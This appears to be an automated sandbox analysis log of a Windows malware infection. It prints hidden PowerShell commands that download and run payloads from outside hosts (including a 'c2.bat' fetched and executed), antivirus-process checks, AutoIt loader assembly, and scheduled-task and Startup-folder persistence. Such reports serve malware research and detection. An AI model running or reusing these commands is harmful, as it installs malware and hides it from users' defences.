Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:temp + '\c2.bat'; invoke-webrequest -uri $url -outfile $output; start-process -filepath $output -nonewwindow"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:temp + '\c2.bat'; invoke-webrequest -uri $url -outfile $output; start-process -filepath $output -nonewwindow"Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002614AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,36_2_002614AE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00261FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,36_2_00261FB0
Source: Propose.com, 0000001C.00000003.2088771240.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.2081389805.0000000000473000.00000002.00000001.01000000.00000010.sdmp, LinkHub.com, 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LinkHub.comBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00220A08 cpuid 36_2_00220A08
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0025E5F4 GetLocalTime,36_2_0025E5F4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0025E652 GetUserNameW,36_2_0025E652
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0023BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,36_2_0023BCD2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,16_2_00406805
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: LinkHub.comBinary or memory string: WIN_81
Source: LinkHub.comBinary or memory string: WIN_XP
